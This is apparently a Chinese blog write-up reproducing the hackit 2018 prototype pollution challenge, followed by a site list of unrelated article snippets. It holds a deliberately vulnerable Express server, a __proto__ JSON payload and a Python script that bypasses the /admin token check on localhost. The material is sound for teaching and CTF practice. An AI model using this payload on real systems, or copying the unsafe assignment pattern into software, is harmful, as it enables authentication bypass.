Liu_Cheng_H
Liu_Cheng_H

复现原型链污染漏洞

目录

一、复现原型链污染漏洞

hackit 2018

1、创建hackit_2018.js文件

2、运行hackit_2018.js文件

3、寻找原型链漏洞 

4、污染原型链

hackit 2018

1、创建hackit_2018.js文件

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now
 
var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}
 
function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}
 
app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);
 
app.get('/', (req, res) => {
 
    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];
 
    }
    res.render('index');
})
 
 
app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is flag{prototype_pollution_is_very_dangerous}');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)
 
 
app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;
 
    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }
 
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 
 
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }
 
    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }
 
})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

2、运行hackit_2018.js文件 

复现原型链污染漏洞_第1张图片

 

3、寻找原型链漏洞  

app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is flag{prototype_pollution_is_very_dangerous}');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}

如果想要成功进入函数内部,就需要满足以下条件

user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken

user.admintoken和md5(user.admintoken)需要等于 req.query.querytoken

4、污染原型链

 这段代码 client通过request请求获得我们传入的值,我们通过传入的值来控制原型对象的值

{"row":"__proto__","col":"admintoken","data":"sunsec"}

将这一段代码上传之后

matrix[client.row][client.col] = client.data;

matrix["__proto__"]["admintoken"] = "sunsec";

matrix.__proto__.admintoken=sunsec

这三段代码表示的意思一致

 所以matrix的原型对象增加了admintoken这一属性

user和admin均为数组,他们的原型对象一致,表示user也获得了admintoken这一属性

user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken

这时候根据之前的思路编写代码污染原型链

通过访问/api污染原型链,访问·/admin上传原型链data对应值的MD5校验值

import requests
import json
url1 = "http://127.0.0.1:3000/api"
url2 = "http://127.0.0.1:3000/admin?querytoken=a3c23537bfc1e2da4a511661547d65fb"
s = requests.session()
headers = { "Content-Type" : "application/json" }
data1 = { "row": "__proto__", "col" : "admintoken" , "data" : "sunsec"}
res1 = s.post(url1,headers=headers,data = json.dumps(data1))
res2 = s.get(url2)
print(res2.text)

运行js文件 

运行python脚本

复现原型链污染漏洞_第2张图片

 成功绕过

复现原型链污染漏洞_第3张图片

 

你可能感兴趣的:(网络)

  • Tesla的FSD 架构设计 WSSWWWSSW 智能驾驶汽车人工智能FSD
    特斯拉的FSD(完全自动驾驶)架构设计以端到端神经网络为核心,结合专用硬件加速、海量数据训练和持续OTA迭代,形成了一套高度集成的系统。以下从硬件、软件、算法、数据处理和安全机制五个维度展开分析:一、硬件架构:从HW3.0到AI5的算力跃迁HW3.0基础设计采用三星14nm工艺的定制SoC,包含12个Cortex-A72CPU核心、2个NPU(合计73.7TOPS算力)和Mali-G71GPU,支
  • 高压电缆护层安全的智能防线:TLKS-PLGD 监控设备深度解析 李子圆圆 安全
    在现代电力系统庞大复杂的网络中,高压电缆护层是守护电力传输的"隐形铠甲",其安全直接影响电网稳定。传统监测手段响应慢、精度低,难以满足安全运维需求。TLKS-PLGD高压电缆护层环流监控设备应运而生,提供智能化解决方案。智能监测:全方位守护TLKS-PLGD专为高压电缆护层安全研发,融合实时监测、智能预警、远程管控技术,构建高精度监控体系。其功能强大:能实时监测接地电流,捕捉细微波动预判隐患;支持
  • 存储延时数据,帮你选数据库和缓存架构 呢喃coding 系统架构设计架构
    1.理解存储媒介量化延时类别描述延时缓存/内存L1cachereference1ns缓存/内存L2cachereference4ns缓存/内存Mainmemoryreference(DDR4,5-10ns为补充说明)100ns网络传输SendpacketCA->Netherlands->CA150,000,000ns(150ms)磁盘存储HDD(HardDiskDrive)读写1-10ms磁盘存储
  • 网络与磁盘:Java架构师必知的系统“血管”和“仓库”
    网络与磁盘:Java架构师必知的系统“血管”和“仓库”作为Java架构师,网络和磁盘是系统数据流动的“血管”与“仓库”。网络决定数据传输的快慢,磁盘影响数据存储的效率,直接关系系统性能和用户体验。一、网络:数据传输的“高速公路”以下是网络相关关键指标的整理表格:网络指标详细说明对Java架构的影响与实践建议万兆带宽实际速度万兆带宽(单位为bit),实际下载/上传速度为1250MB/s(因1字节=8
  • 深入剖析F5、DNS、LVS、Nginx、Tomcat:Java架构师的流量分发指南(一) 呢喃coding 系统架构设计javalvsnginx
    深入剖析F5、DNS、LVS、Nginx、Tomcat:Java架构师的流量分发指南在Java架构设计中,流量分发是保障系统高性能、高可用的关键环节。F5、DNS、LVS、Nginx和Tomcat在流量分发处理中各自扮演着独特的角色,深入理解它们对于Java架构师来说至关重要。一、F5:企业级的应用交付利器(一)功能与特性F5是一款企业级的应用交付网络(ADN)设备,它集负载均衡、应用安全、SSL
  • 电商架构浅析 快乐非自愿 架构大数据
    前言什么是电商,电商有哪些分类,以及一个完整的电商平台应该由哪些模块组成?本文将围绕电商平台系统的整体架构展开分析。一、简介1.什么是电商简单说就是通过网络进行的商务活动。以前的人都是通过现金进行交易,就是所谓的一手交钱、一手交货。而电商,则是通过通过网上商城、物流配送、线上资金结算等过程来完成交易。本质就是买卖双方围绕线上商品进行交易履约的过程。2.电商分类二、业务流程分析目前的电商的种类很多,
  • 内网穿透:在家本地也能搭建“公网服务器”?转发/直连、原理/操作一文读懂!
    这里可以让你终于明白内网穿透是怎么回事了,再也不用求人帮忙搭服务器,自己动手soeasy内网穿透技术允许外网用户访问内网设备,解决了家庭网络中没有公网IP、防火墙端口屏蔽等问题。本文整理汇总介绍了三种实现方式:中转服务器、P2P打洞和路由器端口映射,每种方法都有其优缺点。同时提醒用户注意安全性,避免内网服务被攻击,并提供了快速上手的建议。0、引言你有没有遇到过这些问题?想在外地访问家里的NAS,但
  • TCP backlog工作机制 riverz1227 tcp/ip网络服务器
    Linux中的TCPbacklog:两个队列与丢连接的真相在高并发网络服务场景中,listen()的backlog参数常常被误解,许多TCP连接被悄悄丢弃时,我们甚至毫无察觉。近期在排查一条内核日志TCP:dropopenrequestfrom...时,对此翻阅整理了一些资料,就TCPbacklog在Linux中的工作原理、背后的两个关键队列机制,以及如何高效排查相关连接丢失问题,做些记录01|什
  • 内网穿透和端口映射的区别在哪?局域网提供互联网访问方案对比选择详解 搬码临时工 智能路由器网络
    内网穿透和端口映射是两个经常被提及的概念,它们对于实现网络中的内外网通信起着关键作用。内网穿透和端口映射都能够有效地将本地局域网地址提供给互联网上外网访问,但二者之间存在着显著的区别。内网穿透与端口映射的核心区别在于实现方式和依赖条件不同‌,下面来看看它们之间从原理到实现上的差异详解。一、技术原理与依赖性‌不同端口映射‌:基于‌网络地址转换(NAT)技术‌,通过路由器或防火墙等设备实现。它需要在公
  • 大带宽服务器中冗余技术的功能 wanhengidc 服务器运维
    随着企业对于网络流量需求的逐渐激增,在业务运行的稳定性要求也在不断提高,大带宽服务器作为支撑高负载应用的基础设施,为了能够保障业务的正常运行,大带宽服务器中的冗余设计起着关键的作用,合理的冗余机制,能够在发生网络故障的情况下,依旧确保业务的可用性。下面,我们就来共同了解一下大带宽服务器中冗余技术的功能都有哪些吧!大带宽服务器中的冗余设计是指通过配置多个物理或者逻辑网络连接,保证待单一链路发生故障时
  • LSTM 论文(Hochreiter & Schmidhuber, 1997)精读(三)
    文章:SeppHochreiter,JürgenSchmidhuber;LongShort-TermMemory.NeuralComput1997;9(8):1735–1780.doi:https://doi.org/10.1162/neco.1997.9.8.1735第2节PreviousWork(已有研究),这是论文对以往方法的一个评述,总结了已有递归神经网络在面对时间序列学习、尤其是长时依赖
  • 关于有时候使用VPN后,关闭系统代理后短时间无法正常使用网络的原因及解决办法
    为什么?以下是可能的原因代理设置残留关闭代理后,部分应用或系统服务仍尝试通过原代理服务器连接,导致短暂无法访问网络。DNS缓存未刷新VPN可能修改了DNS服务器,关闭代理后旧DNS缓存未及时清除,需等待缓存过期(通常几分钟到几小时)。路由表未即时恢复VPN会添加特殊路由规则,关闭后系统需要时间恢复默认路由,期间流量可能错误转发。DHCP租约续期延迟校园网/DHCP服务器可能需要时间重新分配IP或更
  • 从0开始学习R语言--Day41--Moran‘s I Chef_Chen 学习
    在处理带有空间特征的数据,我们往往都直接一股脑地处理数据点,但很多时候,空间上的信息对于处理后续衍生出来的问题会有很大帮助,例如对于城市里大小县城的发展情况,只知道单一县城的经济发展曲线,很难解释一些拐点和突然的攀升,而如果知道相邻县城存在经济发展飞快的例子,可能就是被带动了经济水平;亦或者是在处理社交网络的好有问题时,只知道谁和谁是朋友(类似于空间矩阵),是无法推断出经济收入相似的推论的,所以说
  • 从0开始学习计算机视觉--Day08--卷积神经网络
    之前我们提到,神经网络是通过全连接层对输入做降维处理,将输入的向量通过矩阵和激活函数进行降维,在神经元上输出激活值。而卷积神经网络中,用卷积层代替了全连接层。不同的是,这里的输入不再需要降维,而是可以保留输入的空间结构,例如输入的是32×32×3的图片,在全连接层中是3072×1的向量,而卷积层里则保持不变。这里的改变的地方是对于同样的WX的函数形式,这里是把5×5×3的权重矩阵(也叫卷积核)向量
  • minicom中文乱码问题的解决 北方的流星 运维
    当用minicom通过USB调试网络设备时,中文会显示乱码,这时只需要在minicom前加上envLANG=en_US即可正确显示中文,即:$envLANG=en_USminicom但是每次运行每次都需要输入会很麻烦,我们修改一下.bashrc文件就可以了$sudovim~/.bashrc在文件最后添加:aliasminicom='sudoenvLANG=en_USminicom'保存退出,然后执
  • 【容器】优质文章分享
    文章目录加速器Docker教程安装坑volumn网络配置踩坑其他dockerfiledocker-compose手册教程网络坑docker使用dockermysqldockermongoredisdocker-rabbitmqnginxtomcatnacoszookeeperelasticsearch加速器现在docker镜像站真的不好找了。阿里什么的加速目前只能给阿里自己的容器用了。且用且珍惜D
  • Linux 代理(proxy)设置 玖玉ww Linuxlinux运维proxy
    有关网络代理的环境变量环境变量说明可选的取值http_proxyhttp协议的网络连接使用该代理。ip:porthttp://ip:portsocks://ip:portsocks4://ip:portsocks5://ip:porthttps_proxyhttps协议的网络连接使用该代理。ftp_proxyftp协议使用该代理。all_proxy所有网络协议的网络连接都使用该代理;all_pro
  • 2024年最新4大典型安全漏洞是怎么来的?如何解决?,【2024网络安全最新学习路线】 2401_84297193 程序员web安全学习网络
    还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!】93道网络安全面试题内容实在太多,不一一截图了黑客学习资源推荐最后给大家分享一份全套的网络安全
  • 视频讲解:多层感知机MLP与卷积神经网络CNN在服装图像识别中的应用
    原文链接:https://tecdat.cn/?p=42891原文出处:拓端数据部落公众号分析师:ZiqiYe视频讲解:多层感知机MLP与卷积神经网络CNN在服装图像识别中的应用作为数据科学领域的从业者,我们常面临这样的挑战:如何让机器真正“看懂”图像中的信息?在为客户完成服装零售行业的图像识别时,这一问题尤为突出。追溯图像识别技术的发展,早期依赖人工设计特征,如边缘检测、纹理分析等,效率低下且适
  • 30个网络抓包/调试工具-IT运维与网络工程师必会,从零基础到精通,收藏这篇就够了! 程序员羊羊 黑客网安工程师网络安全网络运维安全数据库压力测试web安全
    运维老兵都知道,网络抓包这活儿,就像给网络做CT,透视内部问题。但工具再多,用不对也是白搭。今天咱就来聊聊30款抓包/调试“神器”,别再只会用Wireshark了!一、协议分析工具:别光看表面,还得懂“潜台词”Wireshark:老牌劲旅,但别迷信它简介:开源界的扛把子,协议分析界的“瑞士军刀”,跨平台支持是基本操作。特点:协议多?那是必须的,2000+协议解析,过滤表达式(tcp.port==8
  • 【HarmonyOS】Web 组件的 PDF 文档预览功能详解
    【HarmonyOS】Web组件的PDF文档预览功能详解一、前言应用开发中,PDF文档预览是一项常见需求。虽然官方提供了预览组件,但是在H5业务场景下,如何加载PDF呢?此时就需要Web组件提供了便捷的PDF预览能力。目前官方的ArkWeb,支持加载网络、应用沙箱内、本地资源等多种来源的PDF文档。本文将详细介绍如何使用Web组件实现PDF预览功能,包括不同场景下的加载方法、配置要点及动态切换技巧
  • 如何利用Charles中文版抓包工具提升API调试与网络性能
    在现代软件开发中,调试网络请求、优化API接口的性能是开发者面临的日常挑战之一。特别是在处理复杂的API请求和确保应用的响应速度时,开发者需要借助高效的工具来快速捕获和分析网络流量。Charles抓包工具,以其强大的功能和简易的操作,成为开发者调试和优化API接口、提升应用性能的得力助手。本文将介绍如何利用Charles中文版抓包工具提升API调试效率,捕获并分析HTTP/HTTPS流量,同时优化
  • Java SDN:用代码造出会自己变魔术的网络?虚拟化+资源管理全攻略 墨夶 Java学习资料1java网络php
    一、SDN是什么?网络界的「乐高超人」1.1传统网络:像在玩「俄罗斯方块」传统网络设备就像被焊死的积木,每个路由器都是一块「脾气古怪的石头」,想改个路由规则?得一台台敲命令,**这不比给Excel表格涂色还费劲?**1.2SDN:给网络装个「超脑」SDN=控制平面+数据平面分离,就像把交通指挥中心从马路上搬进控制室,用代码说:“嘿,交换机,数据包该左转还是右转,我远程指挥!”二、Java写SDN控
  • WebRTC(十三):信令服务器 却道天凉_好个秋 WebRTCwebrtc
    作用WebRTC本身只处理媒体流的P2P传输、编解码与传输优化,但不包含信令协议。WebRTC的PeerConnection建立流程,需要两端完成连接协商和网络打洞信息的交换。这些内容包括:功能模块说明SDP协商中转offer/answer信息(媒体能力)ICE候选交换中转NAT穿透相关的候选地址用户身份验证确保用户合法(如token登录)房间管理支持多人房间、用户列表维护心跳检测检测用户连接状态
  • 探秘Linux进程间通信:ipcdump 工具 高慈鹃Faye
    探秘Linux进程间通信:ipcdump工具IPCDump项目地址:https://gitcode.com/gh_mirrors/ip/IPCDumpipcdump是一个强大的开源工具,专门用于追踪Linux系统中的进程间通信(IPC)。这个工具涵盖了管道、FIFO、信号、Unix套接字、回环网络和伪终端等多种常见的IPC机制。无论是调试多进程应用程序还是理解系统中各个组件之间的交互方式,ipcd
  • Ubuntu22.04 安装autoware universe
    注意事项:1,不要用conda包管理2,将autoware项目和autoware_map都放在$Home目录下3,系统的软件更新器更新包这步很重要1,装好了ubuntu22.04系统后,首先装nvidia显卡驱动autoware所需最低驱动版本为550,进入ubuntu恢复模式,启动终端输入以下命令(前提是有网络连接)wgethttps://vip.123pan.cn/1816448054/xTo
  • 光子协议栈:光域协议解析与转换的纳秒级革命(2025技术全景) 百态老人 prompt网络
    –一、技术架构革新:全光协议栈体系光子协议栈通过光域信号处理与硬件协议引擎的深度融合,重构网络协议处理范式。其核心架构包含以下层级:
  • Git安装避坑指南 tonngw git开源开源软件
    Git安装避坑指南大纲系统环境准备确认操作系统版本(Windows/macOS/Linux)检查系统位数(32位或64位)确保网络环境稳定,避免下载中断下载官方安装包推荐从Git官网(https://git-scm.com/)下载避免第三方来源,防止捆绑软件或恶意程序选择与系统匹配的版本(如Windows用户注意选.exe安装包)Windows用户常见问题安装路径避免中文或特殊字符,建议全英文路径
  • Python机器学习与深度学习:决策树、随机森林、XGBoost与LightGBM、迁移学习、循环神经网络、长短时记忆网络、时间卷积网络、自编码器、生成对抗网络、YOLO目标检测等 WangYan2022 机器学习/深度学习Python机器学习深度学习随机森林迁移学习
    融合最新技术动态与实战经验,旨在系统提升以下能力:①掌握ChatGPT、DeepSeek等大语言模型在代码生成、模型调试、实验设计、论文撰写等方面的实际应用技巧②深入理解深度学习与经典机器学习算法的关联与差异,掌握其理论基础③熟练运用PyTorch实现各类深度学习模型,包括迁移学习、循环神经网络(RNN)、长短时记忆网络(LSTM)、时间卷积网络(TCN)、自编码器、生成对抗网络(GAN)、YOL
  • 手机通话语音离线ASR识别商用和优化方向 limingade 本地AI电话机器人手机提取电话的信令和声音智能手机FunASR离线识别Android做ASR手机断网离线ASRASR语音转文字识别语音识别
    手机通话语音离线ASR识别商用和优化方向--本地AI电话机器人上一篇:手机FunASR识别SIM卡通话占用内存和运行性能分析下一篇:编写中。一、前言前面的篇章中,我们尝试了将FunASR的ONNX模型文件加载到Android应用中,实现手机本地不依赖服务器和网络的离线ASR语音识别。并将这个ASR能力应用到了手机麦克风、手机本地的历史通话录音、手机实时的SIM卡电话通话内容的解析上。在实践中,我们
  • [星球大战]阿纳金的背叛 comsci
          本来杰迪圣殿的长老是不同意让阿纳金接受训练的.........     但是由于政治原因,长老会妥协了...这给邪恶的力量带来了机会     所以......现代的地球联邦接受了这个教训...绝对不让某些年轻人进入学院    
  • 看懂它,你就可以任性的玩耍了! aijuans JavaScript
              javascript作为前端开发的标配技能,如果不掌握好它的三大特点:1.原型 2.作用域 3. 闭包 ,又怎么可以说你学好了这门语言呢?如果标配的技能都没有撑握好,怎么可以任性的玩耍呢?怎么验证自己学好了以上三个基本点呢,我找到一段不错的代码,稍加改动,如果能够读懂它,那么你就可以任性了。 function jClass(b
  • Java常用工具包 Jodd Kai_Ge javajodd
    Jodd 是一个开源的 Java 工具集, 包含一些实用的工具类和小型框架。简单,却很强大! 写道 Jodd = Tools + IoC + MVC + DB + AOP + TX + JSON + HTML < 1.5 Mb Jodd 被分成众多模块,按需选择,其中 工具类模块有: jodd-core    &nb
  • SpringMvc下载 120153216 springMVC
    @RequestMapping(value = WebUrlConstant.DOWNLOAD) public void download(HttpServletRequest request,HttpServletResponse response,String fileName) { OutputStream os = null; InputStream is = null;
  • Python 标准异常总结 2002wmj python
    Python标准异常总结 AssertionError 断言语句(assert)失败 AttributeError 尝试访问未知的对象属性 EOFError 用户输入文件末尾标志EOF(Ctrl+d) FloatingPointError 浮点计算错误 GeneratorExit generator.close()方法被调用的时候 ImportError 导入模块失
  • SQL函数返回临时表结构的数据用于查询 357029540 SQL Server
    这两天在做一个查询的SQL,这个SQL的一个条件是通过游标实现另外两张表查询出一个多条数据,这些数据都是INT类型,然后用IN条件进行查询,并且查询这两张表需要通过外部传入参数才能查询出所需数据,于是想到了用SQL函数返回值,并且也这样做了,由于是返回多条数据,所以把查询出来的INT类型值都拼接为了字符串,这时就遇到问题了,在查询SQL中因为条件是INT值,SQL函数的CAST和CONVERST都
  • java 时间格式化 | 比较大小| 时区 个人笔记 7454103 javaeclipsetomcatcMyEclipse
    个人总结! 不当之处多多包含! 引用 1.0 如何设置 tomcat 的时区:          位置:(catalina.bat---JAVA_OPTS  下面加上)          set JAVA_OPT
  • 时间获取Clander的用法 adminjun Clander时间
    /**    * 得到几天前的时间    * @param d    * @param day    * @return    */   public static Date getDateBefore(Date d,int day){    Calend
  • JVM初探与设置 aijuans java
    JVM是Java Virtual Machine(Java虚拟机)的缩写,JVM是一种用于计算设备的规范,它是一个虚构出来的计算机,是通过在实际的计算机上仿真模拟各种计算机功能来实现的。Java虚拟机包括一套字节码指令集、一组寄存器、一个栈、一个垃圾回收堆和一个存储方法域。 JVM屏蔽了与具体操作系统平台相关的信息,使Java程序只需生成在Java虚拟机上运行的目标代码(字节码),就可以在多种平台
  • SQL中ON和WHERE的区别 avords
    SQL中ON和WHERE的区别   数据库在通过连接两张或多张表来返回记录时,都会生成一张中间的临时表,然后再将这张临时表返回给用户。   www.2cto.com   在使用left jion时,on和where条件的区别如下:  1、 on条件是在生成临时表时使用的条件,它不管on中的条件是否为真,都会返回左边表中的记录。 
  • 说说自信 houxinyou 工作生活
    自信的来源分为两种,一种是源于实力,一种源于头脑.实力是一个综合的评定,有自身的能力,能利用的资源等.比如我想去月亮上,要身体素质过硬,还要有飞船等等一系列的东西.这些都属于实力的一部分.而头脑不同,只要你头脑够简单就可以了!同样要上月亮上,你想,我一跳,1米,我多跳几下,跳个几年,应该就到了!什么?你说我会往下掉?你笨呀你!找个东西踩一下不就行了吗?     无论工作还
  • WEBLOGIC事务超时设置 bijian1013 weblogicjta事务超时
            系统中统计数据,由于调用统计过程,执行时间超过了weblogic设置的时间,提示如下错误: 统计数据出错! 原因:The transaction is no longer active - status: 'Rolling Back. [Reason=weblogic.transaction.internal
  • 两年已过去,再看该如何快速融入新团队 bingyingao java互联网融入架构新团队
    偶得的空闲,翻到了两年前的帖子 该如何快速融入一个新团队,有所感触,就记下来,为下一个两年后的今天做参考。     时隔两年半之后的今天,再来看当初的这个博客,别有一番滋味。而我已经于今年三月份离开了当初所在的团队,加入另外的一个项目组,2011年的这篇博客之后的时光,我很好的融入了那个团队,而直到现在和同事们关系都特别好。大家在短短一年半的时间离一起经历了一
  • 【Spark七十七】Spark分析Nginx和Apache的access.log bit1129 apache
    Spark分析Nginx和Apache的access.log,第一个问题是要对Nginx和Apache的access.log文件进行按行解析,按行解析就的方法是正则表达式:   Nginx的access.log解析正则表达式   val PATTERN = """([^ ]*) ([^ ]*) ([^ ]*) (\\[.*\\]) (\&q
  • Erlang patch bookjovi erlang
    Totally five patchs committed to erlang otp, just small patchs. IMO, erlang really is a interesting programming language, I really like its concurrency feature. but the functional programming style
  • log4j日志路径中加入日期 bro_feng javalog4j
    要用log4j使用记录日志,日志路径有每日的日期,文件大小5M新增文件。 实现方式 log4j: <appender name="serviceLog" class="org.apache.log4j.RollingFileAppender"> <param name="Encoding" v
  • 读《研磨设计模式》-代码笔记-桥接模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /** * 个人觉得关于桥接模式的例子,蜡笔和毛笔这个例子是最贴切的:http://www.cnblogs.com/zhenyulu/articles/67016.html * 笔和颜色是可分离的,蜡笔把两者耦合在一起了:一支蜡笔只有一种
  • windows7下SVN和Eclipse插件安装 chenyu19891124 eclipse插件
    今天花了一天时间弄SVN和Eclipse插件的安装,今天弄好了。svn插件和Eclipse整合有两种方式,一种是直接下载插件包,二种是通过Eclipse在线更新。由于之前Eclipse版本和svn插件版本有差别,始终是没装上。最后在网上找到了适合的版本。所用的环境系统:windows7JDK:1.7svn插件包版本:1.8.16Eclipse:3.7.2工具下载地址:Eclipse下在地址:htt
  • [转帖]工作流引擎设计思路 comsci 设计模式工作应用服务器workflow企业应用
    作为国内的同行,我非常希望在流程设计方面和大家交流,刚发现篇好文(那么好的文章,现在才发现,可惜),关于流程设计的一些原理,个人觉得本文站得高,看得远,比俺的文章有深度,转载如下 ================================================================================= 自开博以来不断有朋友来探讨工作流引擎该如何
  • Linux 查看内存,CPU及硬盘大小的方法 daizj linuxcpu内存硬盘大小
    一、查看CPU信息的命令 [root@R4 ~]# cat /proc/cpuinfo |grep "model name" && cat /proc/cpuinfo |grep "physical id" model name : Intel(R) Xeon(R) CPU X5450 @ 3.00GHz model name :
  • linux 踢出在线用户 dongwei_6688 linux
    两个步骤: 1.用w命令找到要踢出的用户,比如下面:   [root@localhost ~]# w 18:16:55 up 39 days, 8:27, 3 users, load average: 0.03, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  • 放手吧,就像不曾拥有过一样 dcj3sjt126com
    内容提要: 静悠悠编著的《放手吧就像不曾拥有过一样》集结“全球华语世界最舒缓心灵”的精华故事,触碰生命最深层次的感动,献给全世界亿万读者。《放手吧就像不曾拥有过一样》的作者衷心地祝愿每一位读者都给自己一个重新出发的理由,将那些令你痛苦的、扛起的、背负的,一并都放下吧!把憔悴的面容换做一种清淡的微笑,把沉重的步伐调节成春天五线谱上的音符,让自己踏着轻快的节奏,在人生的海面上悠然漂荡,享受宁静与
  • php二进制安全的含义 dcj3sjt126com PHP
    PHP里,有string的概念。 string里,每个字符的大小为byte(与PHP相比,Java的每个字符为Character,是UTF8字符,C语言的每个字符可以在编译时选择)。 byte里,有ASCII代码的字符,例如ABC,123,abc,也有一些特殊字符,例如回车,退格之类的。 特殊字符很多是不能显示的。或者说,他们的显示方式没有标准,例如编码65到哪儿都是字母A,编码97到哪儿都是字符
  • Linux下禁用T440s,X240的一体化触摸板(touchpad) gashero linuxThinkPad触摸板
    自打1月买了Thinkpad T440s就一直很火大,其中最让人恼火的莫过于触摸板。   Thinkpad的经典就包括用了小红点(TrackPoint)。但是小红点只能定位,还是需要鼠标的左右键的。但是自打T440s等开始启用了一体化触摸板,不再有实体的按键了。问题是要是好用也行。   实际使用中,触摸板一堆问题,比如定位有抖动,以及按键时会有飘逸。这就导致了单击经常就
  • graph_dfs hcx2013 Graph
    package edu.xidian.graph; class MyStack { private final int SIZE = 20; private int[] st; private int top; public MyStack() { st = new int[SIZE]; top = -1; } public void push(i
  • Spring4.1新特性——Spring核心部分及其他 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • 配置HiveServer2的安全策略之自定义用户名密码验证 liyonghui160com
        具体从网上看   http://doc.mapr.com/display/MapR/Using+HiveServer2#UsingHiveServer2-ConfiguringCustomAuthentication   LDAP Authentication using OpenLDAP Setting
  • 一位30多的程序员生涯经验总结 pda158 编程工作生活咨询
    1.客户在接触到产品之后,才会真正明白自己的需求。   这是我在我的第一份工作上面学来的。只有当我们给客户展示产品的时候,他们才会意识到哪些是必须的。给出一个功能性原型设计远远比一张长长的文字表格要好。 2.只要有充足的时间,所有安全防御系统都将失败。   安全防御现如今是全世界都在关注的大课题、大挑战。我们必须时时刻刻积极完善它,因为黑客只要有一次成功,就可以彻底打败你。   3.
  • 分布式web服务架构的演变 自由的奴隶 linuxWeb应用服务器互联网
    最开始,由于某些想法,于是在互联网上搭建了一个网站,这个时候甚至有可能主机都是租借的,但由于这篇文章我们只关注架构的演变历程,因此就假设这个时候已经是托管了一台主机,并且有一定的带宽了,这个时候由于网站具备了一定的特色,吸引了部分人访问,逐渐你发现系统的压力越来越高,响应速度越来越慢,而这个时候比较明显的是数据库和应用互相影响,应用出问题了,数据库也很容易出现问题,而数据库出问题的时候,应用也容易
  • 初探Druid连接池之二——慢SQL日志记录 xingsan_zhang 日志连接池druid慢SQL
    由于工作原因,这里先不说连接数据库部分的配置,后面会补上,直接进入慢SQL日志记录。   1.applicationContext.xml中增加如下配置: <bean abstract="true" id="mysql_database" class="com.alibaba.druid.pool.DruidDataSourc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他